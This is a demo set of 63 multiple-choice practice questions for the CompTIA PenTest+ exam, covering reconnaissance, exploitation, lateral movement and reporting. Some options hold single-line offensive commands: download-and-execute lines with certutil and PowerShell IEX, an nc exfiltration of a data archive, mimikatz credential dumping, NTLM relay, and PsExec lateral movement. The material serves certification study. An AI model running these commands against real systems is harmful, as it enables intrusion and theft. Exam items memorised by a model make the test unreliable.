CompTIA PT0-003 CompTIA PenTest+ Exam Exam Practice Test

Demo: 63 questions
Total 246 questions

CompTIA PenTest+ Exam Questions and Answers

Question 1

A penetration tester has adversely affected a critical system during an engagement, which could have a material impact on the organization. Which of the following should the penetration tester do to address this issue?

Options:

A.

Restore the configuration.

B.

Perform a BIA.

C.

Follow the escalation process.

D.

Select the target.

Question 2

A penetration tester observes the following output from an Nmap command while attempting to troubleshoot connectivity to a Linux server:

Starting Nmap 7.91 ( https://nmap.org ) at 2024-01-10 12:00 UTC
Nmap scan report for example.com (192.168.1.10)
Host is up (0.001s latency).
Not shown: 9999 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
2222/tcp open  ssh
444/tcp  open  microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds

Which of the following is the most likely reason for the connectivity issue?

Options:

A.

The SSH service is running on a different port.

B.

The SSH service is blocked by a firewall.

C.

The SSH service requires certificate authentication.

D.

The SSH service is not active.

Question 3

A tester obtains access to an endpoint subnet and wants to move laterally in the network. Given the following output:

Nmap scan report for some_host
Host is up (0.01 latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results: smb2-security-mode: Message signing disabled

Which of the following command and attack methods is the most appropriate for reducing the chances of being detected?

Options:

A.

responder -T eth0 -dwv ntlmrelayx.py -smb2support -tf

B.

msf > use exploit/windows/smb/ms17_010_psexec msf > msf > run

C.

hydra -L administrator -P /path/to/passwdlist smb://

D.

nmap --script smb-brute.nse -p 445

Question 4

A penetration tester is attempting to discover vulnerabilities in a company's web application. Which of the following tools would most likely assist with testing the security of the web application?

Options:

A.

OpenVAS

B.

Nessus

C.

sqlmap

D.

Nikto

Question 5

A penetration tester assesses a complex web application and wants to explore potential security weaknesses by searching for subdomains that might have existed in the past. Which of the following tools should the penetration tester use?

Options:

A.

Censys.io

B.

Shodan

C.

Wayback Machine

D.

SpiderFoot

Question 6

During an assessment, a penetration tester obtains access to a Microsoft SQL server using sqlmap and runs the following command:

sql> xp_cmdshell whoami /all

Which of the following is the tester trying to do?

Options:

A.

List database tables

B.

Show logged-in database users

C.

Enumerate privileges

D.

Display available SQL commands

Question 7

A penetration tester needs to confirm the version number of a client's web application server. Which of the following techniques should the penetration tester use?

Options:

A.

SSL certificate inspection

B.

URL spidering

C.

Banner grabbing

D.

Directory brute forcing

Question 8

A penetration tester is configuring a vulnerability management solution to perform credentialed scans of an Active Directory server. Which of the following account types should the tester provide to the scanner?

Options:

A.

Read-only

B.

Domain administrator

C.

Local user

D.

Root

Question 9

A penetration tester attempts unauthorized entry to the company's server room as part of a security assessment. Which of the following is the best technique to manipulate the lock pins and open the door without the original key?

Options:

A.

Plug spinner

B.

Bypassing

C.

Decoding

D.

Raking

Question 10

During a web application assessment, a penetration tester identifies an input field that allows JavaScript injection. The tester inserts a line of JavaScript that results in a prompt, presenting a text box when browsing to the page going forward. Which of the following types of attacks is this an example of?

Options:

A.

SQL injection

B.

SSRF

C.

XSS

D.

Server-side template injection

Question 11

A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use?

Options:

A.

powershell.exe impo C:\tools\foo.ps1

B.

certutil.exe -f https://192.168.0.1/foo.exe bad.exe

C.

powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/ ")

D.

rundll32.exe c:\path\foo.dll,functName

Question 12

A penetration tester is searching for vulnerabilities or misconfigurations on a container environment. Which of the following tools will the tester most likely use to achieve this objective?

Options:

A.

Nikto

B.

Trivy

C.

Nessus

D.

Nmap

Question 13

A penetration tester needs to obtain sensitive data from several executives who regularly work while commuting by train. Which of the following methods should the tester use for this task?

Options:

A.

Shoulder surfing

B.

Credential harvesting

C.

Bluetooth spamming

D.

MFA fatigue

Question 14

During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.

INSTRUCTIONS

Analyze the code segments to determine which sections are needed to complete a port scanning script.

Drag the appropriate elements into the correct locations to complete the script.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Question 15

A penetration tester is performing reconnaissance for a web application assessment. Upon investigation, the tester reviews the robots.txt file for items of interest.

INSTRUCTIONS

Select the tool the penetration tester should use for further investigation.

Select the two entries in the robots.txt file that the penetration tester should recommend for removal.

Options:

Question 16

A penetration tester is performing a network security assessment. The tester wants to intercept communication between two users and then view and potentially modify transmitted data. Which of the following types of on-path attacks would be best to allow the penetration tester to achieve this result?

Options:

A.

DNS spoofing

B.

ARP poisoning

C.

VLAN hopping

D.

SYN flooding

Question 17

Which of the following technologies is most likely used with badge cloning? (Select two).

Options:

A.

NFC

B.

RFID

C.

Bluetooth

D.

Modbus

E.

Zigbee

F.

CAN bus

Question 18

Which of the following activities should be performed to prevent uploaded web shells from being exploited by others?

Options:

A.

Remove the persistence mechanisms.

B.

Spin down the infrastructure.

C.

Preserve artifacts.

D.

Perform secure data destruction.

Question 19

A penetration tester has just started a new engagement. The tester is using a framework that breaks the life cycle into 14 components. Which of the following frameworks is the tester using?

Options:

A.

OWASP MASVS

B.

OSSTMM

C.

MITRE ATT&CK

D.

CREST

Question 20

A tester is finishing an engagement and needs to ensure that artifacts resulting from the test are safely handled. Which of the following is the best procedure for maintaining client data privacy?

Options:

A.

Remove configuration changes and any tools deployed to compromised systems.

B.

Securely destroy or remove all engagement-related data from testing systems.

C.

Search through configuration files changed for sensitive credentials and remove them.

D.

Shut down C2 and attacker infrastructure on premises and in the cloud.

Question 21

A penetration tester obtains password dumps associated with the target and identifies strict lockout policies. The tester does not want to lock out accounts when attempting access. Which of the following techniques should the tester use?

Options:

A.

Credential stuffing

B.

MFA fatigue

C.

Dictionary attack

D.

Brute-force attack

Question 22

A penetration tester is performing a cloud-based penetration test against a company. Stakeholders have indicated the priority is to see if the tester can get into privileged systems that are not directly accessible from the internet. Given the following scanner information:

Server-side request forgery (SSRF) vulnerability in test.comptia.org

Reflected cross-site scripting (XSS) vulnerability in test2.comptia.org

Publicly accessible storage system named static_comptia_assets

SSH port 22 open to the internet on test3.comptia.org

Open redirect vulnerability in test4.comptia.org

Which of the following attack paths should the tester prioritize first?

Options:

A.

Synchronize all the information from the public bucket and scan it with Trufflehog.

B.

Run Pacu to enumerate permissions and roles within the cloud-based systems.

C.

Perform a full dictionary brute-force attack against the open SSH service using Hydra.

D.

Use the reflected cross-site scripting attack within a phishing campaign to attack administrators.

E.

Leverage the SSRF to gain access to credentials from the metadata service.

Question 23

During a penetration test, a tester attempts to pivot from one Windows 10 system to another Windows system. The penetration tester thinks a local firewall is blocking connections. Which of the following command-line utilities built into Windows is most likely to disable the firewall?

Options:

A.

certutil.exe

B.

bitsadmin.exe

C.

msconfig.exe

D.

netsh.exe

Question 24

While performing a penetration testing exercise, a tester executes the following command:

PS c:\tools> c:\hacks\PsExec.exe \\server01.comptia.org -accepteula cmd.exe

Which of the following best explains what the tester is trying to do?

Options:

A.

Test connectivity using PSExec on the server01 using CMD.exe.

B.

Perform a lateral movement attack using PsExec.

C.

Send the PsExec binary file to the server01 using CMD.exe.

D.

Enable CMD.exe on the server01 through PsExec.

Question 25

A penetration tester needs to help create a threat model of a custom application. Which of the following is the most likely framework the tester will use?

Options:

A.

MITRE ATT&CK

B.

OSSTMM

C.

CI/CD

D.

DREAD

Question 26

During a penetration test, a tester compromises a Windows computer. The tester executes the following command and receives the following output:

mimikatz # privilege::debug
mimikatz # lsadump::cache
---Output---
lapsUser
27dh9128361tsg2€459210138754ij
---OutputEnd---

Which of the following best describes what the tester plans to do by executing the command?

Options:

A.

The tester plans to perform the first step to execute a Golden Ticket attack to compromise the Active Directory domain.

B.

The tester plans to collect application passwords or hashes to compromise confidential information within the local computer.

C.

The tester plans to use the hash collected to perform lateral movement to other computers using a local administrator hash.

D.

The tester plans to collect the ticket information from the user to perform a Kerberoasting attack on the domain controller.

Question 27

A penetration tester is conducting an assessment of a web application's login page. The tester needs to determine whether there are any hidden form fields of interest. Which of the following is the most effective technique?

Options:

A.

XSS

B.

On-path attack

C.

SQL injection

D.

HTML scraping

Question 28

A penetration tester is conducting reconnaissance on a target network. The tester runs the following Nmap command: nmap -sv -sT -p - 192.168.1.0/24. Which of the following describes the most likely purpose of this scan?

Options:

A.

OS fingerprinting

B.

Attack path mapping

C.

Service discovery

D.

User enumeration

Question 29

A penetration tester gains shell access to a Windows host. The tester needs to permanently turn off protections in order to install additional payload. Which of the following commands is most appropriate?

Options:

A.

sc config start=disabled

B.

sc query state= all

C.

pskill

D.

net config

Question 30

Which of the following protocols would a penetration tester most likely utilize to exfiltrate data covertly and evade detection?

Options:

A.

FTP

B.

HTTPS

C.

SMTP

D.

DNS

Question 31

A penetration tester has been asked to conduct a blind web application test against a customer's corporate website. Which of the following tools would be best suited to perform this assessment?

Options:

A.

ZAP

B.

Nmap

C.

Wfuzz

D.

Trufflehog

Question 32

A penetration tester successfully gained access to manage resources and services within the company's cloud environment. This was achieved by exploiting poorly secured administrative credentials that had extensive permissions across the network. Which of the following credentials was the tester able to obtain?

Options:

A.

IAM credentials

B.

SSH key for cloud instance

C.

Cloud storage credentials

D.

Temporary security credentials (STS)

Question 33

A penetration tester needs to evaluate the order in which the next systems will be selected for testing. Given the following output:

Hostname      | IP address     | CVSS 2.0 | EPSS
hrdatabase    | 192.168.20.55  | 9.9      | 0.50
financesite   | 192.168.15.99  | 8.0      | 0.01
legaldatabase | 192.168.10.2   | 8.2      | 0.60
fileserver    | 192.168.125.7  | 7.6      | 0.90

Which of the following targets should the tester select next?

Options:

A.

fileserver

B.

hrdatabase

C.

legaldatabase

D.

financesite

Question 34

A penetration tester is working on an engagement in which a main objective is to collect confidential information that could be used to exfiltrate data and perform a ransomware attack. During the engagement, the tester is able to obtain an internal foothold on the target network. Which of the following is the next task the tester should complete to accomplish the objective?

Options:

A.

Initiate a social engineering campaign.

B.

Perform credential dumping.

C.

Compromise an endpoint.

D.

Share enumeration.

Question 35

A penetration tester wants to check the security awareness of specific workers in the company with targeted attacks. Which of the following attacks should the penetration tester perform?

Options:

A.

Phishing

B.

Tailgating

C.

Whaling

D.

Spear phishing

Question 36

A penetration tester wants to use PowerView in an AD environment. Which of the following is the most likely reason?

Options:

A.

To collect local hashes

B.

To decrypt stored passwords

C.

To enumerate user groups

D.

To escalate privileges

Question 37

A penetration tester completed OSINT work and needs to identify all subdomains for mydomain.com. Which of the following is the best command for the tester to use?

Options:

A.

nslookup mydomain.com >> /path/to/results.txt

B.

crunch 1 2 | xargs -n 1 -I 'X' nslookup X.mydomain.com

C.

dig @8.8.8.8 mydomain.com ANY >> /path/to/results.txt

D.

cat wordlist.txt | xargs -n 1 -I 'X' dig X.mydomain.com

Question 38

While conducting a peer review for a recent assessment, a penetration tester finds the debugging mode is still enabled for the production system. Which of the following is most likely responsible for this observation?

Options:

A.

Configuration changes were not reverted.

B.

A full backup restoration is required for the server.

C.

The penetration test was not completed on time.

D.

The penetration tester was locked out of the system.

Question 39

After a recent penetration test was conducted by the company's penetration testing team, a systems administrator notices the following in the logs:

2/10/2023 05:50AM C:\users\mgranite\schtasks /query
2/10/2023 05:53AM C:\users\mgranite\schtasks /CREATE /SC DAILY

Which of the following best explains the team's objective?

Options:

A.

To enumerate current users

B.

To determine the users' permissions

C.

To view scheduled processes

D.

To create persistence in the network

Question 40

A penetration tester attempts to run an automated web application scanner against a target URL. The tester validates that the web page is accessible from a different device. The tester analyzes the following HTTP request header logging output:

200; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0
200; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0
No response; POST /login.aspx HTTP/1.1 Host: foo.com; User-Agent: curl
200; POST /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0
No response; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: python

Which of the following actions should the tester take to get the scans to work properly?

Options:

A.

Modify the scanner to slow down the scan.

B.

Change the source IP with a VPN.

C.

Modify the scanner to only use HTTP GET requests.

D.

Modify the scanner user agent.

Question 41

A client recently hired a penetration testing firm to conduct an assessment of their consumer-facing web application. Several days into the assessment, the client's networking team observes a substantial increase in DNS traffic. Which of the following would most likely explain the increase in DNS traffic?

Options:

A.

Covert data exfiltration

B.

URL spidering

C.

HTML scraping

D.

DoS attack

Question 42

A penetration tester is performing an authorized physical assessment. During the test, the tester observes an access control vestibule and on-site security guards near the entry door in the lobby. Which of the following is the best attack plan for the tester to use in order to gain access to the facility?

Options:

A.

Clone badge information in public areas of the facility to gain access to restricted areas.

B.

Tailgate into the facility during a very busy time to gain initial access.

C.

Pick the lock on the rear entrance to gain access to the facility and try to gain access.

D.

Drop USB devices with malware outside of the facility in order to gain access to internal machines.

Question 43

An external legal firm is conducting a penetration test of a large corporation. Which of the following would be most appropriate for the legal firm to use in the subject line of a weekly email update?

Options:

A.

Privileged & Confidential Status Update

B.

Action Required Status Update

C.

Important Weekly Status Update

D.

Urgent Status Update

Question 44

A penetration tester wants to use the following Bash script to identify active servers on a network:

1 network_addr="192.168.1"
2 for h in {1..254}; do
3 ping -c 1 -W 1 $network_addr.$h > /dev/null
4 if [ $? -eq 0 ]; then
5 echo "Host $h is up"
6 else
7 echo "Host $h is down"
8 fi
9 done

Which of the following should the tester do to modify the script?

Options:

A.

Change the condition on line 4.

B.

Add 2>&1 at the end of line 3.

C.

Use seq on the loop on line 2.

D.

Replace $h with ${h} on line 3.

Question 45

Which of the following is a term used to describe a situation in which a penetration tester bypasses physical access controls and gains access to a facility by entering at the same time as an employee?

Options:

A.

Badge cloning

B.

Shoulder surfing

C.

Tailgating

D.

Site survey

Question 46

A penetration tester finishes an initial discovery scan for hosts on a /24 customer subnet. The customer states that the production network is composed of Windows servers but no container clusters. The following are the last several lines from the scan log:

Line 1: 112 hosts found... trying ports
Line 2: FOUND 22 with OpenSSH 1.2p2 open on 99 hosts
Line 3: FOUND 161 with UNKNOWN banner open on 110 hosts
Line 4: TCP RST received on ports 21, 3389, 80
Line 5: Scan complete.

Which of the following is the most likely reason for the results?

Options:

A.

Multiple honeypots were encountered

B.

The wrong subnet was scanned

C.

Windows is using WSL

D.

IPS is blocking the ports

Question 47

You are a security analyst tasked with hardening a web server.

You have been given a list of HTTP payloads that were flagged as malicious.

INSTRUCTIONS

Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Question 48

A penetration tester reviews a SAST vulnerability scan report. The following vulnerability has been reported as high severity:

Source file: components.ts

Issue 2 of 12: Command injection

Severity: High

Call: .innerHTML = response

The tester inspects the source file and finds the variable response is defined as a constant and is not referred to or used in other sections of the code. Which of the following describes how the tester should classify this reported vulnerability?

Options:

A.

False negative

B.

False positive

C.

True positive

D.

Low severity

Question 49

A tester enumerated a firewall policy and now needs to stage and exfiltrate data captured from the engagement. Given the following firewall policy:

Action | SRC                       | DEST                  | Protocol
Block  | 192.168.10.0/24 : 1-65535 | 10.0.0.0/24 : 22      | TCP
Allow  | 0.0.0.0/0 : 1-65535       | 192.168.10.0/24 : 443 | TCP
Allow  | 192.168.10.0/24 : 1-65535 | 0.0.0.0/0 : 443       | TCP
Block  | .                         | .                     | *

Which of the following commands should the tester try next?

Options:

A.

tar -zcvf /tmp/data.tar.gz /path/to/data && nc -w 3 443 < /tmp/data.tar.gz

B.

gzip /path/to/data && cp data.gz 443

C.

gzip /path/to/data && nc -nvlk 443; cat data.gz | nc -w 3 22

D.

tar -zcvf /tmp/data.tar.gz /path/to/data && scp /tmp/data.tar.gz

Question 50

During an assessment, a penetration tester runs the following command:

setspn.exe -Q /

Which of the following attacks is the penetration tester preparing for?

Options:

A.

LDAP injection

B.

Pass-the-hash

C.

Kerberoasting

D.

Dictionary

Question 51

A penetration tester plans to conduct reconnaissance during an engagement using readily available resources. Which of the following resources would most likely identify hardware and software being utilized by the client?

Options:

A.

Cryptographic flaws

B.

Protocol scanning

C.

Cached pages

D.

Job boards

Question 52

A penetration testing team wants to conduct DNS lookups for a set of targets provided by the client. The team crafts a Bash script for this task. However, they find a minor error in one line of the script:

1 #!/bin/bash
2 for i in $(cat example.txt); do
3 curl $i
4 done

Which of the following changes should the team make to line 3 of the script?

Options:

A.

resolvconf $i

B.

rndc $i

C.

systemd-resolve $i

D.

host $i

Question 53

During a security assessment of an e-commerce website, a penetration tester wants to exploit a vulnerability in the web server’s input validation that will allow unauthorized transactions on behalf of the user. Which of the following techniques would most likely be used for that purpose?

Options:

A.

Privilege escalation

B.

DOM injection

C.

Session hijacking

D.

Cross-site scripting

Question 54

A penetration tester successfully clones a source code repository and then runs the following command:

find . -type f -exec egrep -i "token|key|login" {} \;

Which of the following is the penetration tester conducting?

Options:

A.

Data tokenization

B.

Secrets scanning

C.

Password spraying

D.

Source code analysis

Question 55

A penetration tester sets up a C2 (Command and Control) server to manage and control payloads deployed in the target network. Which of the following tools is the most suitable for establishing a robust and stealthy connection?

Options:

A.

ProxyChains

B.

Covenant

C.

PsExec

D.

sshuttle

Question 56

Which of the following is most important when communicating the need for vulnerability remediation to a client at the conclusion of a penetration test?

Options:

A.

Articulation of cause

B.

Articulation of impact

C.

Articulation of escalation

D.

Articulation of alignment

Question 57

SIMULATION

Using the output, identify potential attack vectors that should be further investigated.

Options:

Question 58

Which of the following components should a penetration tester include in the final assessment report?

Options:

A.

User activities

B.

Customer remediation plan

C.

Key management

D.

Attack narrative

Question 59

During a red-team exercise, a penetration tester obtains an employee's access badge. The tester uses the badge's information to create a duplicate for unauthorized entry. Which of the following best describes this action?

Options:

A.

Smurfing

B.

Credential stuffing

C.

RFID cloning

D.

Card skimming

Question 60

A penetration testing team needs to determine whether it is possible to disrupt the wireless communications for PCs deployed in the client's offices. Which of the following techniques should the penetration tester leverage?

Options:

A.

Port mirroring

B.

Sidecar scanning

C.

ARP poisoning

D.

Channel scanning

Question 61

During a penetration test, a junior tester uses Hunter.io for an assessment and plans to review the information that will be collected. Which of the following describes the information the junior tester will receive from the Hunter.io tool?

Options:

A.

A collection of email addresses for the target domain that is available on multiple sources on the internet

B.

DNS records for the target domain and subdomains that could be used to increase the external attack surface

C.

Data breach information about the organization that could be used for additional enumeration

D.

Information from the target's main web page that collects usernames, metadata, and possible data exposures

Question 62

A penetration tester has discovered sensitive files on a system. Assuming exfiltration of the files is part of the scope of the test, which of the following is most likely to evade DLP systems?

Options:

A.

Encoding the data and pushing through DNS to the tester's controlled server.

B.

Padding the data and uploading the files through an external cloud storage service.

C.

Obfuscating the data and pushing through FTP to the tester's controlled server.

D.

Hashing the data and emailing the files to the tester's company inbox.

Question 63

During an assessment, a penetration tester wants to extend the vulnerability search to include the use of dynamic testing. Which of the following tools should the tester use?

Options:

A.

Mimikatz

B.

ZAP

C.

OllyDbg

D.

SonarQube
